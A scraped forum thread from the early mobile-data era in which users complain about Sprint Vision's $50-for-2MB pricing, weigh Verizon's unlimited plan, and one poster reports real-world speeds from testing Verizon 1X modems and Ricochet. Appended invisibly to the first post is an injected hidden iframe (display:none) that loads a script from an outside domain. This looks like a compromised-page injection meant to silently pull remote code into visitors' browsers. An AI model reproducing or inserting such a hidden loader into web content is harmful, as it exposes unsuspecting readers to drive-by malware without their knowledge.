+ Reply to Thread

Vision Prices Silly

Vision prices are ridiculous. $50 for 2mb!!! Good luck on selling this service.....Sprint screws up again. i'll stay with wireless web for free. $30 for 180/200 free WW is fine for me and for many,many people. Why didnt they run decent prices? Im sure a few geeks will go for this but not enough to keep it afloat. Now theyre going to have to come up with something else to sell this. I cant believe that many people have been waiting so long for this. Its a rip-off.
    2mb !!!!! Thats nothing!! Should be at least 10mb.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Napoleon Bonaparte Jr.

Hello

Should be unlimited plan too .

I am really start thinking about Verizon .

They have unlimited plan ...

Administrator

Arrow

verizon had some big prices also in their first rollout (which is still underway), and have just now offered better pricing (no doubt to counter the churn that may or may not happen from sprints 3g).

certainly sprint will have some better deals when future smartphones rollout, but i agree the initial prices are steep!

We've been testing the Verizon 1X modems....here's some feedback:

If you are expecting blinding speed...think again. Remember that all the pitches for "high-speed" wireless relate to old speeds of 19.2 and 14.4kbps, so yes, it's faster than that. However, throughput is enhanced by "compression clients", which do not work well (if at all) when running VPN.

So, it's so-so speed for browsing the web, slooooow for VPN, and yeah...blinding for email (with no attachments).

In contrast, we also tested on Metricom's net before it folded (Rocochet), which was pleasingly fast at ~128kbps (pretty close to ISDN most of the time). Buy, alas...they are creeping back very slowly.

Bottom line....we all expect "fast" to be ...you know, FAST. However, for any DSL of cable modem users, this wireless service (regardless of carrier) is still slow and expensive.

Just a view from a R&D project........
    Dr. Dan